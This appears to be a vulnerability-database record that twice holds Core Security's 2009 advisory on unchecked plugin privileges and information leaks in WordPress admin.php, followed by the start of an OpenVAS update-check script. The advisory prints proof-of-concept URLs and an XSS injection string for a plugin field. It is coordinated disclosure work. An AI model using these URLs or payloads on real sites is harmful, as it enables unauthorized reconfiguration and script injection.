Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. 
*Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. 
An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 
2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in Worpress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 
2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team release WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. 
*About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\r\nTPRpR0Gn0WqmF8HOeDslbA8=\r\n=zEDK\r\n-----END PGP SIGNATURE-----\r\n\r\n# sebug.net\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14855", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:44:34", "description": "No description provided by source.", "published": "2009-07-09T00:00:00", "type": "seebug", "title": "WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11777", "id": "SSV:11777", "sourceData": "\n WordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Pr \\\r\nivileges_Unchecked Date published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. 
*Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and Jos\u00e9 Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. 
During 2008, the large number of bugs reported by researchers led\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must be copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavaScript code that injects PHP code. 
It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/opt \\\r\n ions.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. 
On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways- \\\r\n to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/optio \\\r\n ns.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode( \\\r\n83))</script><ahref="\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. 
*Abuse example: viewing WP Security Scanner Plugin Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php \\\r\n \r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). 
These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 
2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 
2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in WordPress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team releases WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon as WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. 
*References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. 
*About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11777", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2018-04-06T11:39:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064407", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064407", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-7729 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7729.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated 
from advisory FEDORA-2009-7729 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7729\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64407\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-7729 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
